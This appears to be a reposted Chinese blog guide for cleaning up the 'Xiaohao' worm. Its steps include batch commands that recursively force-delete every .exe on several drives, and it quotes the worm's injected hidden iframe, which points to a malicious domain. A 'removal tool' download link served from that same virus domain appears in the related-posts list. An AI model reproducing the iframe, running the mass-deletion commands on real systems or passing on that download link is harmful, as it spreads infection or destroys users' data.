请立刻采取措施预防“小浩”病毒,否则会死的很惨!
“小浩”病毒与“熊猫烧香”蠕虫病毒极为相似,除了可以感染*.exe可执行程序,并将所以被感染的可执行文件图标变为一个“浩”字以外,病毒还会感染各种网页脚本程序,将正常网页插入带毒网址,并且可以通过U盘进行传播。值得注意的是该病毒的破坏能力甚至超过了“熊猫烧香”,被感染的*.exe文件将遭到彻底破坏,即使专业的数据恢复公司也无法恢复——除非你有干净的备份。
1、立即升级杀毒软件的病毒库——如果你的杀毒软件不能升级,还是卸了吧,没有任何用处。
所以一旦感染了该病毒,基本上就是对系统宣判了死刑——理论上讲是有办法不重装系统的,你需要将所有病毒进程干掉以保证当前的工作环境干净,并保证不再运行任何已被感染的病毒文件,不在让病毒通过任何途径被唤醒,然后拿出安装盘去修复系统文件,然后删除所有病毒文件和已感染文件,修复所有被病毒破坏的注册表项、网页文件等,搞定!
但是我想如果你不是手工杀毒老手,还是老老实实的格盘,重装系统吧。如果你还是想试试,建议你首先把所有重要数据(哪怕是被感染了的)做备份,然后再试。
以下方法适用于重装系统及以后的过程:
1、插入安装盘,格式化C盘(或者你之前安装系统的盘),然后重装系统。
2、必须设置足够复杂的密码,并且在进行完第5步之前拔掉你的网线!
3、当你进入系统后,切记不要双击打开任何盘,否则你的系统就白装了!如果你非要打开,那么请使用右键菜单中的“打开”选项。
4、除系统盘外其他的所有盘里如果没有重要数据,建议直接格式化(在进行步骤4前千万不要双击打开任何盘!!)。如果有重要数据,并且那些数据不是exe文件,请运行CMD打开命令行,分别执行以下两条命令:
FOR %I IN (d:,e:,f:) DO CD /D %I & FOR %J IN (*.exe) DO DEL %J /A HS /F /S
FOR %I IN (d:,e:,f:) DO CD /D %I & FOR %J IN (autorun.inf) DO DEL %J /A HS /F
第一条的作用是删除D\E\F盘下所有目录的所有exe文件(因为被感染了,且无法修复,不删除还留着做纪念啊?),第二条是删除每个盘根目录下的autorun.inf文件。这里没有写C盘(两个命令的第一个括号里),因为默认C盘是系统盘,如果你的系统装到了X盘,就把X盘不写,其他所有的盘符按照第一个括号里的格式补充进去。
请注意:这一步的删除操作是无法返回的,请确认你那些exe文件都没用了再进行,否则责任自负!
5、检查所有的htm\html\php\jsp\asp\aspx文件,删除这些文件代码中的以下行(在进行步骤5前千万不要双击打开这些文件!!):
<iframe src=http://xiaohao.yona.biz/xiaohao.htm width=0 height=0></iframe>
该步操作的原因是病毒会在这些文件中写入以上这句代码,任何人打开这些文件都会自动浏览上面这个链接,而浏览链接的直接结果就是:再次中毒!
6、截至到这一步,病毒留下的祸害就被清除干净了,现在要做的是预防!插上网线,按照上面的方法立刻开始预防!
转载于:https://blog.51cto.com/zjhwin/38616
请立刻采取措施预防“小浩”病毒,否则会死的很惨!相关推荐
- 小浩病毒专杀工具下载
下载地址: http://xiaohao.yona.biz/CleanXiaohao.exe
- 数据安全防线:预防.malox勒索病毒的攻击及其数据解密恢复
目录 第一部分:关于.malox勒索病毒的介绍 第二部分:被.malox勒索病毒感染服务器的企业案例: 第三部分:.malox勒索病毒的数据解密恢复的方法 第四部分.预防.malox勒索病毒的有效措施 ...
- 漫画:小浩和画师小姐姐的一天
这两天超级忙,整个人连看部电影的时间都木有.忙啥嘞?忙学习,忙生活,忙工作,忙写文章,忙着准备录制视频,忙着为疫情期间身上多出的十斤肉赎罪 等等等等.然后在这一大堆事情里,给自己设计一个形象的事最为有 ...
- 小浩算法-java题解(二分篇)
小浩算法-java题解-二分篇 二分篇 第875题:阿珂喜欢吃香蕉 第69题:x的平方根 第278题:第一个错误的版本 第153题:旋转排序数组最小值Ⅰ 第154题:旋转排序数组最小值Ⅱ 第475题: ...
- 小浩算法目录汇总(20200320-第三版)
到今天为止,小浩算法 "365刷题计划" 已经进行了65天,距离目标还有300天.创作题解70余篇,总计共20万字,得到8000读者的支持!在此说一声感谢,多亏了大家我才能坚持下来 ...
- 没发文的小浩一天是怎么度过的
有人问我每天是怎么过的...好吧,既然你们好奇(文中有一定创作成分,但基本真实): 早上 7:30 闹铃响,迈出征服世界第一步 -- 起床.一晚上缓存有点满了,先去洗手间清了个缓存. 清完缓存,匆匆忙 ...
- 小浩漫画算法目录汇总(20200301版)
哈喽,大家好.又到月初了,如果你每天跟着小浩刷题,目前应该已经完成了50余题.基本上各类型的题目,也都已有所了解,那我将十分欣慰.这里我对1-2月的原创题解进行了汇总,按照我认为比较理想的学习顺序进行 ...
- 小浩算法全目录汇总 - 20200520版
各位好,小浩自2019年1月以来,共完成了一百篇算法题解,并且每道题目都配有图示.我计划继续输出至少两百篇高频算法题解,目标是完成一本至少300道题目的图解算法题典,面向算法小白.同时,我的个人 bl ...
- 小浩蠕虫(xiaohao.exe)的分析和解决方法
推荐:用电脑尽情K歌.练歌,一展歌喉.打造自己的MTV音乐专辑,分享给所有网友 一.小浩蠕虫(xiaohao.exe)病毒的基本情况 病毒名称:Worm.Win32.Xiaohao.a 病毒别名:小浩 ...
最新文章
- 沈向洋:浅谈人工智能创造
- SAP PM入门系列29 - IW65 Display Activities
- 【数字信号处理】相关函数 ( 自相关函数示例 )
- gnuplot_i 文件的说明,翻译成的中文
- python中的defaultdict_简介Python的collections模块中defaultdict类型的用法
- PHP header发送各种类型文件下载
- Linux ct获取本机ip,[原]archlinux 下最新的netct工具配置ip地址
- Android Studio 每次运行都会再下载一遍,修改
- [在职软件工程]面向对象的分析与设计
- html转pdf分页问题
- python源代码(create,huafen,doc)
- 2021-2022蓝桥杯寒假集训训练 - 问题 G: HTML新の手 -图片收集者
- Windows 7下 IE升级到,IE 11的F12控制台不能使用的解决
- java,png,jpg,如何合并图片进行盖章,并且对印章的位置进行定位。
- 关于以太网没有有效的ip配置问题解决方法
- js字符与ascii码转换
- 关于导数非常的好文章
- 办公族的正确呼吸方式
- 软件工程小组课程设计项目
- xss平台模块代码分析--默认模块
热门文章
- 如何进行任务与缺陷跟踪管理?~ TechExcel DevSuite 五虎上将篇之任务与缺陷管理高手 DevTrack(一)
- pcl1.8.1下载安装
- 漫谈 Clustering (1): k-means
- 常见的linux、docker、kubectl命令
- JAVA抽象类案例(猫和狗)
- 未明学院:秋招之前,你至少有九次机会进四大!
- 怎么查看便签的历史记录
- 用户自定义实现定时任务?很简单我教你实现!
- Kubernetes资源编排系列之四: CRD+Operator篇
- 遨游Maxthon上次未关闭页面的文件保存在哪里?